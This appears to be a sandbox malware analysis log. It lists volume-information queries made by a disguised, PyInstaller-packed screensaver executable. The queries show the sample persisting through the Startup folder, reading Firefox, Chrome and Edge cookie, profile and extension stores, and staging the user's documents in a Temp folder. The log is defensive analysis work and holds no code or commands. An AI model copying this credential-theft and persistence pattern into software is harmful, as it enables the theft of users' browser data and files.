Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\_socket.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\_hashlib.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\_queue.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\unicodedata.pyd VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\content-prefs.sqlite VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\favicons.sqlite VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\permissions.sqlite VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \System\Antivirus.txt VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\protections.sqlite VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage.sqlite VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\webappsstore.sqlite VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\BJZFPPWAPT.docx VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \System\System Info.txt VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\BJZFPPWAPT.docx VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\DUUDTUBZFW.pdf VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\DUUDTUBZFW.pdf VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.mp3 VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\EIVQSAOTAQ.mp3 VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\EIVQSAOTAQ.pdf VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\EIVQSAOTAQ.pdf VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\EOWRVPQCCS.jpg VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\EOWRVPQCCS.jpg VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\EOWRVPQCCS.xlsx VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\EOWRVPQCCS.xlsx VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\GIGIYTFFYT.jpg VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\GIGIYTFFYT.jpg VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.docx VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\PALRGUCVEH.docx VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.xlsx VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\PALRGUCVEH.xlsx VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\QCOILOQIKC.mp3 VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\QCOILOQIKC.mp3 VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\TQDFJHPUIU.png VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\TQDFJHPUIU.png VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.png VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Desktop\ZGGKNSUKOP.png VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\BJZFPPWAPT.docx VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\BJZFPPWAPT.docx VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\DUUDTUBZFW.pdf VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\EIVQSAOTAQ.mp3 VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\EIVQSAOTAQ.mp3 VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\EIVQSAOTAQ.pdf VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\EIVQSAOTAQ.pdf VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\EOWRVPQCCS.jpg VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\EOWRVPQCCS.jpg VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\EOWRVPQCCS.xlsx VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\EOWRVPQCCS.xlsx VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\GIGIYTFFYT.jpg VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\GIGIYTFFYT.jpg VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\PALRGUCVEH.docx VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\PALRGUCVEH.docx VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\PALRGUCVEH.xlsx VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\PALRGUCVEH.xlsx VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\QCOILOQIKC.mp3 VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\QCOILOQIKC.mp3 VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\TQDFJHPUIU.png VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\TQDFJHPUIU.png VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Documents\ZGGKNSUKOP.png VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Documents\ZGGKNSUKOP.png VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\BJZFPPWAPT.docx VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Downloads\BJZFPPWAPT.docx VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\DUUDTUBZFW.pdf VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Downloads\DUUDTUBZFW.pdf VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\EIVQSAOTAQ.mp3 VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Downloads\EIVQSAOTAQ.mp3 VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\ls-archive.sqlite VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\EIVQSAOTAQ.pdf VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Downloads\EIVQSAOTAQ.pdf VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\EOWRVPQCCS.jpg VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Downloads\EOWRVPQCCS.jpg VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\EOWRVPQCCS.xlsx VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\000003.log VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\??? \Common Files\Downloads\EOWRVPQCCS.xlsx VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Downloads\GIGIYTFFYT.jpg VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
